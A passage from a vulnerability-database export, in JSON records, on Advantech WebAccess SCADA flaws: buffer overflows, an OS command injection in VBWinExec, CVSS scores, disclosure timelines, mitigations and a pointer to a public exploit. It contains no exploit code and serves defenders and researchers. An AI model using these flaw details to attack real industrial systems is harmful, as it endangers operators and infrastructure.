"AdvantechWebAccessCHNNode_2014.03.03_3.3.1", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=49251" } ], "sources": [ { "db": "ZDI", "id": "ZDI-14-073" }, { "db": "CNVD", "id": "CNVD-2014-02242" }, { "db": "JVNDB", "id": "JVNDB-2014-001977" }, { "db": "CNNVD", "id": "CNNVD-201404-172" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-119", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-68259" }, { "db": "JVNDB", "id": "JVNDB-2014-001977" }, { "db": "NVD", "id": "CVE-2014-0766" } ] }, "references": { "_id": null, "data": [ { "trust": 3.8, "url": "http://ics-cert.us-cert.gov/advisories/icsa-14-079-03" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/66725" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0766" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-0766" }, { "trust": 0.6, "url": "http://osvdb.com/show/osvdb/105565" }, { "trust": 0.6, "url": "http://secunia.com/advisories/57873" } ], "sources": [ { "db": "ZDI", "id": "ZDI-14-073" }, { "db": "CNVD", "id": "CNVD-2014-02242" }, { "db": "VULHUB", "id": "VHN-68259" }, { "db": "JVNDB", "id": "JVNDB-2014-001977" }, { "db": "CNNVD", "id": "CNNVD-201404-172" }, { "db": "NVD", "id": "CVE-2014-0766" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "0cd436b2-1edf-11e6-abef-000c29c66e3d", "ident": null }, { "db": "IVD", "id": "168cdc96-2352-11e6-abef-000c29c66e3d", "ident": null }, { "db": "ZDI", "id": "ZDI-14-073", "ident": null }, { "db": "CNVD", "id": "CNVD-2014-02242", "ident": null }, { "db": "VULHUB", "id": "VHN-68259", "ident": null }, { "db": "BID", "id": "66725", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2014-001977", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201404-172", "ident": null }, { "db": "NVD", "id": "CVE-2014-0766", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2014-04-11T00:00:00", "db": "IVD", "id": "0cd436b2-1edf-11e6-abef-000c29c66e3d", "ident": null }, { "date": "2014-04-11T00:00:00", "db": "IVD", "id": "168cdc96-2352-11e6-abef-000c29c66e3d", "ident": null }, { "date": "2014-04-10T00:00:00", "db": "ZDI", "id": "ZDI-14-073", "ident": null }, { "date": "2014-04-11T00:00:00", "db": "CNVD", "id": "CNVD-2014-02242", "ident": null }, { "date": "2014-04-12T00:00:00", "db": "VULHUB", "id": "VHN-68259", "ident": null }, { "date": "2014-04-08T00:00:00", "db": "BID", "id": "66725", "ident": null }, { "date": "2014-04-15T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-001977", "ident": null }, { "date": "2014-04-15T00:00:00", "db": "CNNVD", "id": "CNNVD-201404-172", "ident": null }, { "date": "2014-04-12T04:37:31.533000", "db": "NVD", "id": "CVE-2014-0766", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2014-04-10T00:00:00", "db": "ZDI", "id": "ZDI-14-073", "ident": null }, { "date": "2014-04-11T00:00:00", "db": "CNVD", "id": "CNVD-2014-02242", "ident": null }, { "date": "2015-07-09T00:00:00", "db": "VULHUB", "id": "VHN-68259", "ident": null }, { "date": "2014-04-17T00:40:00", "db": "BID", "id": "66725", "ident": null }, { "date": "2014-04-15T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-001977", "ident": null }, { "date": "2014-04-15T00:00:00", "db": "CNNVD", "id": "CNNVD-201404-172", "ident": null }, { "date": "2024-11-21T02:02:46.320000", "db": "NVD", "id": "CVE-2014-0766", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201404-172" } ], "trust": 0.6 }, "title": { "_id": null, "data": "Advantech WebAccess odeName2 Parameter Handling Stack Buffer Overflow Vulnerability", "sources": [ { "db": "IVD", "id": "0cd436b2-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "168cdc96-2352-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-02242" } ], "trust": 1.0 }, "type": { "_id": null, "data": "Buffer overflow", "sources": [ { "db": "IVD", "id": "0cd436b2-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "168cdc96-2352-11e6-abef-000c29c66e3d" }, { "db": "CNNVD", "id": "CNNVD-201404-172" } ], "trust": 1.0 } }
var-201802-1104
Vulnerability from variot
The VBWinExec function in Node\AspVBObj.dll in Advantech WebAccess 8.3.0 allows remote attackers to execute arbitrary OS commands via a single argument (aka the command parameter). Advantech WebAccess Is OS A command injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. The 'VBWinExec' function of the NodeAspVBObj.dll file in Advantech WebAccess version 8.3.0 has an operating system command injection vulnerability
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201802-1104", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 1.8, "vendor": "advantech", "version": "8.3.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8..3.0" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-002211" }, { "db": "CNNVD", "id": "CNNVD-201802-965" }, { "db": "NVD", "id": "CVE-2018-6911" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-002211" } ] }, "cve": "CVE-2018-6911", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CVE-2018-6911", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.9, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "VHN-136943", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2018-6911", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2018-6911", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "CVE-2018-6911", "trust": 0.8, "value": "Critical" }, { "author": "CNNVD", "id": "CNNVD-201802-965", "trust": 0.6, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-136943", "trust": 0.1, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2018-6911", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "VULHUB", "id": "VHN-136943" }, { "db": "VULMON", "id": "CVE-2018-6911" }, { "db": "JVNDB", "id": "JVNDB-2018-002211" }, { "db": "CNNVD", "id": "CNNVD-201802-965" }, { "db": "NVD", "id": "CVE-2018-6911" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The VBWinExec function in Node\\AspVBObj.dll in Advantech WebAccess 8.3.0 allows remote attackers to execute arbitrary OS commands via a single argument (aka the command parameter). Advantech WebAccess Is OS A command injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. The \u0027VBWinExec\u0027 function of the NodeAspVBObj.dll file in Advantech WebAccess version 8.3.0 has an operating system command injection vulnerability", "sources": [ { "db": "NVD", "id": "CVE-2018-6911" }, { "db": "JVNDB", "id": "JVNDB-2018-002211" }, { "db": "VULHUB", "id": "VHN-136943" }, { "db": "VULMON", "id": "CVE-2018-6911" } ], "trust": 1.8 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-136943", "trust": 0.1, "type": "unknown" }, { "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=44031", "trust": 0.1, "type": "exploit" } ], "sources": [ { "db": "VULHUB", "id": "VHN-136943" }, { "db": "VULMON", "id": "CVE-2018-6911" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2018-6911", "trust": 2.6 }, { "db": "EXPLOIT-DB", "id": "44031", "trust": 2.6 }, { "db": "JVNDB", "id": "JVNDB-2018-002211", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201802-965", "trust": 0.7 }, { "db": "PACKETSTORM", "id": "146360", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-136943", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2018-6911", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-136943" }, { "db": "VULMON", "id": "CVE-2018-6911" }, { "db": "JVNDB", "id": "JVNDB-2018-002211" }, { "db": "CNNVD", "id": "CNNVD-201802-965" }, { "db": "NVD", "id": "CVE-2018-6911" } ] }, "id": "VAR-201802-1104", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-136943" } ], "trust": 0.53470696 }, "last_update_date": "2024-11-23T23:08:46.604000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.co.jp/products/a7b4308c-a3d0-446c-8f03-0d098d4b2c31/advantech-webaccess/mod_b975c492-56b3-4eba-8bbb-5b6d3483ee9d" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-002211" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-78", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-136943" }, { "db": "JVNDB", "id": "JVNDB-2018-002211" }, { "db": "NVD", "id": "CVE-2018-6911" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.7, "url": "https://www.exploit-db.com/exploits/44031/" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-6911" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-6911" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/78.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" } ], "sources": [ { "db": "VULHUB", "id": "VHN-136943" }, { "db": "VULMON", "id": "CVE-2018-6911" }, { "db": "JVNDB", "id": "JVNDB-2018-002211" }, { "db": "CNNVD", "id": "CNNVD-201802-965" }, { "db": "NVD", "id": "CVE-2018-6911" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULHUB", "id": "VHN-136943" }, { "db": "VULMON", "id": "CVE-2018-6911" }, { "db": "JVNDB", "id": "JVNDB-2018-002211" }, { "db": "CNNVD", "id": "CNNVD-201802-965" }, { "db": "NVD", "id": "CVE-2018-6911" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-02-13T00:00:00", "db": "VULHUB", "id": "VHN-136943" }, { "date": "2018-02-13T00:00:00", "db": "VULMON", "id": "CVE-2018-6911" }, { "date": "2018-04-02T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-002211" }, { "date": "2018-02-13T00:00:00", "db": "CNNVD", "id": "CNNVD-201802-965" }, { "date": "2018-02-13T14:29:00.217000", "db": "NVD", "id": "CVE-2018-6911" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2019-08-02T00:00:00", "db": "VULHUB", "id": "VHN-136943" }, { "date": "2019-08-02T00:00:00", "db": "VULMON", "id": "CVE-2018-6911" }, { "date": "2018-04-02T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-002211" }, { "date": "2019-08-05T00:00:00", "db": "CNNVD", "id": "CNNVD-201802-965" }, { "date": "2024-11-21T04:11:24.463000", "db": "NVD", "id": "CVE-2018-6911" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201802-965" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess In OS Command injection vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-002211" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "operating system commend injection", "sources": [ { "db": "CNNVD", "id": "CNNVD-201802-965" } ], "trust": 0.6 } }
var-201708-1706
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within nvA1Media.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-550" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-17-550" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ZDI-17-550", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-17-550", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-550" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within nvA1Media.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.", "sources": [ { "db": "ZDI", "id": "ZDI-17-550" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-4108", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-17-550", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-550" } ] }, "id": "VAR-201708-1706", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T01:55:47.887000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 120 day deadline.11/08/2016, 11/09/2016, 11/10/2016 and 11/15/2016 - ZDI disclosed the reports, 44 in all, to ICS-CERT11/09/2016 - The vendor acknowledged receipt of the report through ICS-CERT and ICS-CERT provided ICS-VU-71410304/27/2017 - ICS-CERT notified ZDI these might be fixed in the latest version and asked would ZDI re-test05/03/2017 - ZDI replied that we cannot do the testing for AdvantechICS-CERT did not respond06/23/2017 - ZDI wrote to ICS-CERT requesting any available update07/31/2017 - ZDI wrote to ICS-CERT requesting any available update08/01/2017 - ZDI wrote to ICS-CERT advising of the intent to 0-day-- Mitigation:The killbit can be set on this control to disable scripting within Internet Explorer by modifying the data value of the Compatibility Flags DWORD within the following location in the registry:HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\E19E79EC-F62E-40A0-952D-E49AEC7BEC2FIf the Compatibility Flags value is set to 0x00000400, the control can no longer be instantiated inside the browser.For more information, please see: ", "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-550" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-550" } ] }, "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-17-550", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-550", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-550", "ident": null } ] }, "title": { "_id": null, "data": "(0Day) Advantech WebAccess nvA1Media Connect MediaPassword Stack-based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-17-550" } ], "trust": 0.7 } }
var-201602-0483
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x13C71 IOCTL in the BwOpcTool subsystem. A stack-based buffer overflow vulnerability exists in a call to sprintf using the ProjectName parameter. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201602-0483", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-147" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-16-147" } ], "trust": 0.7 }, "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "ZDI-16-147", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-16-147", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-147" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x13C71 IOCTL in the BwOpcTool subsystem. A stack-based buffer overflow vulnerability exists in a call to sprintf using the ProjectName parameter. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.", "sources": [ { "db": "ZDI", "id": "ZDI-16-147" } ], "trust": 0.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-3170", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-16-147", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-147" } ] }, "id": "VAR-201602-0483", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T01:43:19.461000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI vulnerability disclosure policy on lack of vendor response.09/15/2015 - 09/17/2015 - ZDI disclosed reports to ICS-CERT (+1 more on 9/29/2015).09/15/2015 and 09/17/2015 - ICS-CERT acknowledged with a tracking number.10/06/2015 - ICS-CERT advised ZDI that the vendor was working on a patch tentatively planned for November.11/10/2015 - ICS-CERT advised ZDI that this patch/next version would be released in early December.12/14/2015 - ZDI asked ICS-CERT if a patch was available. 12/15/2015 - ICS-CERT advised ZDI that a patch release was expected \"any day now.\"12/15/2015 - ICS-CERT inquired with the vendor about the patch.01/06/2016 - ICS-CERT advised ZDI that the vendor released WebAccess 8.1.01/06/2016 - ZDI asked ICS-CERT what fixes are supposed to be in the build. 01/13/2016 - ICS-CERT provided ZDI with a written draft advisory.01/15/2016 - ICS-CERT published an advisory.01/15/2016 - ZDI asked ICS-CERT to confirm CVE mapping.01/22/2016 and 01/26/2016 - ZDI discussed with ICS-CERT by phone the concern that the patch seemed incomplete.01/27/2015 - ZDI concluded that this cases is not patched.02/01/2015 - ZDI notified ICS-CERT intent to release a 0-day advisory02/02/2015 - ZDI advisory released.-- Mitigation:Given the nature of the vulnerability, the only salient mitigation strategy is to restrict interaction with the service to trusted machines. Only the clients and servers that have a legitimate procedural relationship with the service should be permitted to communicate with it. This could be accomplished in a number of ways, most notably with firewall rules/whitelisting. These features are available in the native Windows Firewall, as described in and numerous other Microsoft Knowledge Base articles.", "trust": 0.7, "url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-147" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 0.7, "url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-147" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "ZDI", "id": "ZDI-16-147" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, 